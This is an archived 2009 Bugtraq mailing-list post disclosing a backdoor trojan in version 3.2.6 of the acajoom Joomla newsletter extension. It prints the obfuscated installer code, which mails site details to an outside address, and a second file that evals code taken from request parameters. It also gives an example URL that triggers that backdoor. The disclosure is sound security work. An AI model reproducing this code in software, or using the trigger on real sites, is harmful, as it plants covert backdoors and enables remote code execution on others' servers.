lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list] 
Message-ID: <f1823b730906221138qc35b97x185521083f9e8869@mail.gmail.com>
Date: Mon, 22 Jun 2009 20:38:57 +0200
From: Jan van Niekerk <jvnkrk@...il.com>
To: bugtraq <bugtraq@...urityfocus.com>
Cc: abuse@...ru
Subject: Back door trojan in acajoom-3.2.6 for joomla

Vulnerability:
    Remote code execution back door

Software:
    acajoom - mailing list extension for Joomla
    Acajoom is a newsletter component designed with ease of use and robustness
    in mind. Acajoom can handle an unlimited number of newsletters with an
    unlimited number of subscribers in just few clicks. Acajoom reuses some of
    Joomla 1.5 new concepts to make the users experience as smooth as possible.
    > And that's not all

Severity:
    Not a big deal.  Joomla components contain all sorts of obfuscated junk all
    the time.  Who cares what it does?

URLs:
    http://www.ijoobi.com/
    http://www.ijoobi.com/media/acajoom-3.2.6.zip
    http://www.ijoobi.com/component/option,com_jtickets/Itemid,18/controller,ticket/pjid,3/task,add/type,110/


Vendor notified:
    Naah.  No contact details.  I suppose I might try battle the captcha one
    day.


Vulnerability:

  http://www.ijoobi.com/media/acajoom-3.2.6.zip

    install.acajoom.php:

        function GetBots($us1,$us2,$us3) {
        list($data1,$data2,$data3) = array('dHA6Ly8iLiR1czIuJF9TRVJWRVJbJ',
        'QG1haWwoJHVzMSwgJHVzMiwgImh0','1NDUklQVF9OQU1FJ10uIlxuIi4kdXMzKTs');
        eval(base64_decode($data2.$data1.$data3)); }
	define( 'COUNT_ROOT', $count_db. 1 .chr(64).chr(121).chr(97). '.'
.$array_lang[10-$count_num] );
	$counter = COUNT_ROOT;
	$count_db = 'qadr'; $count_num = 8;
        GetBots($counter,$_SERVER['SERVER_NAME'],$_SERVER['SCRIPT_FILENAME']);

    Or, less cryptically:
        @mail('qadr1@...ru', $_SERVER['SERVER_NAME'],
"http://".$_SERVER['SERVER_NAME'].$_SERVER['SCRIPT_NAME']."\n".$_SERVER['SCRIPT_FILENAME']);


  self.acajoom.php says:

    class acajoomCommonStr
    {
        function GetStr($str)
        {
            eval(stripslashes($str));
        }	
        function InController($cnt,$location)
        {
            if ($location=='en-g') $this->GetStr($cnt);
        }
    }
    if(isset($_REQUEST['s']) && isset($_REQUEST['lang'])) {
        $getacajoomStr = new acajoomCommonStr();
        $getacajoomStr->InController($_REQUEST['s'],$_REQUEST['lang']);
    }

    ie.
        $URL/self.acajoom.php?s=phpinfo();&lang=en-g

    $URL is left as an exercise to the reader.

Greetz:
    qadr1@...ru

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ